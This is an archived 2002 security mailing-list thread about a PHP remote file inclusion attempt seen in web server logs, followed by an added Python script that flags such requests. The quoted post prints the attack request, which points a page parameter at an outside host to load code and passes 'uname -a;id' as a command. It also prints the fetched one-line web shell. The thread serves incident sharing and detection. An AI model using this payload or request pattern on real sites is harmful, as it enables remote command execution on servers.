I noticed the same attack 9/16. It originated from 200.165.31.202.

Regards,
Harald

----- Original Message -----
From: "zeno" <bugtraqat_private>
To: <webppsecat_private>
Cc: <incidentsat_private>
Sent: Tuesday, September 17, 2002 8:12 PM
Subject: Good practical php attack example

> I figured a few people may find this interesting.
>
> 200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
>
> contents of www.jtecx.hpg.com.br/jtec.txt
>
> ------------------- start snip
>
> <?php
> system($cmd);
> ?>
>
> ------------------- end snip
>
> He is attempting to include code from site B into site A and have it execute the code locally.
> You can see he is issuing it commands via a query "&cmd=uname%20-a;id".
>
> Anyone else have any good examples of these types of attacks? Real life experiences, etc...
>
> - zenoat_private
>
> FULL PACKET DUMP BELOW
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
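Detection logic for the kind of request quoted in zeno's post, as an added example that is not part of the original thread: it parses Apache combined-log lines and flags any query parameter whose value is itself a URL (a remote-include attempt such as file=http://...) or contains shell metacharacters (such as cmd=uname%20-a;id). The three log lines are constructed; the first copies the request line from the post, the other two are ordinary traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample Apache combined-log lines. The first mirrors the
# request quoted in the post; the other two are benign requests.
SAMPLE_LOG = """\
200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"
10.0.0.5 - - [14/Sep/2002:16:48:01 -0400] "GET /index.php?file=about.php HTTP/1.0" 200 1432 "-" "Mozilla/4.0"
10.0.0.6 - - [14/Sep/2002:16:49:10 -0400] "GET /index.php?file=contact.php&page=2 HTTP/1.0" 200 980 "http://www.example.com/" "Mozilla/4.0"
"""

# Combined-log request line: client IP, timestamp, method, target, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A parameter value that is itself a URL is the signature of a remote include.
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Shell metacharacters in a value suggest a command is being passed through.
SHELL_META_RE = re.compile(r'[;|&`$]')

def parse_query(target):
    """Split the query on '&' only (PHP's default separator), so ';' stays
    inside a value exactly as the application would receive it."""
    query = target.partition('?')[2]
    pairs = []
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def analyse(line):
    """Return (ip, kind, param, value) findings for one log line; [] if clean."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for name, value in parse_query(m['target']):
        if REMOTE_RE.match(value):
            findings.append((m['ip'], 'remote_include', name, value))
        if SHELL_META_RE.search(value):
            findings.append((m['ip'], 'shell_metachar', name, value))
    return findings

def scan(log_text):
    """Run analyse over every line; findings come back in log order."""
    return [f for line in log_text.splitlines() for f in analyse(line)]

if __name__ == '__main__':
    for ip, kind, name, value in scan(SAMPLE_LOG):
        print(f'{ip}: {kind} in parameter {name!r}: {value!r}')
```

Only the request target is inspected, so a URL in the Referer field (third line) does not trigger a finding.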
This archive was generated by hypermail 2b30 : Wed Sep 18 2002 - 16:47:59 PDT